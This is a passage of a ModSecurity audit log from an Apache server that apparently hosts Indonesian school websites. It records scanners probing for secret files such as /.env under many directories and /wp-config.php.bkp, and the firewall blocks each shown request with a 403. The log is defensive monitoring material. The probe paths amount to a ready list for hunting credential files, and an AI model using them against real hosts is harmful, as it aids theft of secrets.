X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 37.202.207.26
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
Accept: */*
--7f314a0d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--7f314a0d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745569649119583 815 (- - -)
Stopwatch2: 1745569649119583 815; combined=322, p1=287, p2=0, p3=0, p4=0, p5=35, sr=76, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7f314a0d-Z--
--6f4e003a-A--
[25/Apr/2025:15:43:22 +0700] aAtLKuOdEP6frSVs8Cpw6gAAABU 103.236.140.4 41062 103.236.140.4 8181
--6f4e003a-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 104.248.209.195
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 104.248.209.195
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--6f4e003a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6f4e003a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745570602196727 794 (- - -)
Stopwatch2: 1745570602196727 794; combined=361, p1=309, p2=0, p3=0, p4=0, p5=52, sr=119, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6f4e003a-Z--
--de92681a-A--
[25/Apr/2025:16:06:46 +0700] aAtQpuXF4ZX3hX-IbN7cUwAAAIw 103.236.140.4 46626 103.236.140.4 8181
--de92681a-B--
GET /.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 45.148.10.172
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 45.148.10.172
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36
Accept-Charset: utf-8
--de92681a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--de92681a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745572006401951 1094 (- - -)
Stopwatch2: 1745572006401951 1094; combined=347, p1=308, p2=0, p3=0, p4=0, p5=39, sr=77, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--de92681a-Z--
--4a933d11-A--
[25/Apr/2025:17:41:06 +0700] aAtmwuXF4ZX3hX-IbN7hmwAAAIE 103.236.140.4 40404 103.236.140.4 8181
--4a933d11-B--
GET /wp-config.php.bkp HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 198.57.247.194
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 198.57.247.194
X-Forwarded-Proto: http
Connection: close
Accept: */*
--4a933d11-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--4a933d11-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745577666757616 770 (- - -)
Stopwatch2: 1745577666757616 770; combined=316, p1=281, p2=0, p3=0, p4=0, p5=35, sr=95, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4a933d11-Z--
--1d19f665-A--
[25/Apr/2025:17:49:55 +0700] aAto0z8HMZgF-3Y3GtGAZQAAAE8 103.236.140.4 42512 103.236.140.4 8181
--1d19f665-B--
GET /app/.env HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 9362317
--1d19f665-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--1d19f665-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745578195359504 887 (- - -)
Stopwatch2: 1745578195359504 887; combined=353, p1=313, p2=0, p3=0, p4=0, p5=40, sr=81, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1d19f665-Z--
--aeb59448-A--
[25/Apr/2025:17:49:55 +0700] aAto0z8HMZgF-3Y3GtGAZgAAAEg 103.236.140.4 42516 103.236.140.4 8181
--aeb59448-B--
GET /backend/.env HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 137268852
--aeb59448-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--aeb59448-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745578195557212 685 (- - -)
Stopwatch2: 1745578195557212 685; combined=274, p1=241, p2=0, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--aeb59448-Z--
--81c1ee21-A--
[25/Apr/2025:17:49:55 +0700] aAto0z8HMZgF-3Y3GtGAZwAAAEY 103.236.140.4 42520 103.236.140.4 8181
--81c1ee21-B--
GET /api/.env HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 9362320
--81c1ee21-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--81c1ee21-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745578195755123 716 (- - -)
Stopwatch2: 1745578195755123 716; combined=302, p1=269, p2=0, p3=0, p4=0, p5=33, sr=79, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--81c1ee21-Z--
--106d0271-A--
[25/Apr/2025:17:49:55 +0700] aAto0z8HMZgF-3Y3GtGAaAAAAEk 103.236.140.4 42524 103.236.140.4 8181
--106d0271-B--
GET /code/.env HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 137268855
--106d0271-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--106d0271-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745578195953356 677 (- - -)
Stopwatch2: 1745578195953356 677; combined=263, p1=230, p2=0, p3=0, p4=0, p5=33, sr=67, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--106d0271-Z--
--3a3ab105-A--
[25/Apr/2025:17:49:56 +0700] aAto1D8HMZgF-3Y3GtGAaQAAAFY 103.236.140.4 42528 103.236.140.4 8181
--3a3ab105-B--
GET /db/.env HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 9362323
--3a3ab105-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--3a3ab105-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745578196150944 701 (- - -)
Stopwatch2: 1745578196150944 701; combined=257, p1=227, p2=0, p3=0, p4=0, p5=30, sr=66, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--3a3ab105-Z--
--ad801e04-A--
[25/Apr/2025:17:49:56 +0700] aAto1D8HMZgF-3Y3GtGAagAAAEI 103.236.140.4 42536 103.236.140.4 8181
--ad801e04-B--
GET /login/.env HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 9362326
--ad801e04-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--ad801e04-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745578196348358 841 (- - -)
Stopwatch2: 1745578196348358 841; combined=329, p1=286, p2=0, p3=0, p4=0, p5=42, sr=75, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ad801e04-Z--
--29b49551-A--
[25/Apr/2025:17:49:56 +0700] aAto1D8HMZgF-3Y3GtGAawAAAFc 103.236.140.4 42540 103.236.140.4 8181
--29b49551-B--
GET /api_v1/go/.env HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 137268861
--29b49551-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--29b49551-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745578196546751 684 (- - -)
Stopwatch2: 1745578196546751 684; combined=252, p1=220, p2=0, p3=0, p4=0, p5=32, sr=67, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--29b49551-Z--
--3f27bf25-A--
[25/Apr/2025:17:49:56 +0700] aAto1D8HMZgF-3Y3GtGAbAAAAFI 103.236.140.4 42544 103.236.140.4 8181
--3f27bf25-B--
GET /api_v1/.env HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 9362329
--3f27bf25-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--3f27bf25-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745578196743662 682 (- - -)
Stopwatch2: 1745578196743662 682; combined=259, p1=228, p2=0, p3=0, p4=0, p5=31, sr=67, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--3f27bf25-Z--
--2697ce6d-A--
[25/Apr/2025:17:49:56 +0700] aAto1OXF4ZX3hX-IbN7h_gAAAJA 103.236.140.4 42548 103.236.140.4 8181
--2697ce6d-B--
GET /api_v2/.env HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 137268864
--2697ce6d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--2697ce6d-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745578196941636 702 (- - -)
Stopwatch2: 1745578196941636 702; combined=278, p1=243, p2=0, p3=0, p4=0, p5=34, sr=64, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2697ce6d-Z--
--e4466743-A--
[25/Apr/2025:17:49:57 +0700] aAto1eXF4ZX3hX-IbN7h_wAAAIw 103.236.140.4 42552 103.236.140.4 8181
--e4466743-B--
GET /api_v2/.env HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 9362332
--e4466743-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--e4466743-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745578197138764 736 (- - -)
Stopwatch2: 1745578197138764 736; combined=306, p1=280, p2=0, p3=0, p4=0, p5=26, sr=115, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e4466743-Z--
--49da7221-A--
[25/Apr/2025:17:49:57 +0700] aAto1eXF4ZX3hX-IbN7iAQAAAI4 103.236.140.4 42560 103.236.140.4 8181
--49da7221-B--
GET /v2/.env HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 137268870
--49da7221-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--49da7221-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745578197537841 664 (- - -)
Stopwatch2: 1745578197537841 664; combined=314, p1=270, p2=0, p3=0, p4=0, p5=44, sr=100, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--49da7221-Z--
--896c9061-A--
[25/Apr/2025:17:49:57 +0700] aAto1eXF4ZX3hX-IbN7iAwAAAJg 103.236.140.4 42566 103.236.140.4 8181
--896c9061-B--
GET /v1/.env HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 137268873
--896c9061-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--896c9061-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745578197935866 659 (- - -)
Stopwatch2: 1745578197935866 659; combined=323, p1=275, p2=0, p3=0, p4=0, p5=48, sr=106, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--896c9061-Z--
--d1342f48-A--
[25/Apr/2025:17:49:58 +0700] aAto1uXF4ZX3hX-IbN7iBAAAAIo 103.236.140.4 42572 103.236.140.4 8181
--d1342f48-B--
GET /admin/.env HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Cookie:
X-Forwarded-For: 164.92.74.66
Accept-Encoding: gzip
X-Varnish: 9362341
--d1342f48-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--d1342f48-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745578198133453 665 (- - -)
Stopwatch2: 1745578198133453 665; combined=255, p1=225, p2=0, p3=0, p4=0, p5=30, sr=65, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d1342f48-Z--
--9ab04d5a-A--
[25/Apr/2025:17:49:58 +0700] aAto1uXF4ZX3hX-IbN7iBQAAAIY 103.236.140.4 42580 103.236.140.4 8181
--9ab04d5a-B--
GET /laravel/.env HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 164.92.74.66
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: https
Upgrade-Insecure-Requests: 1
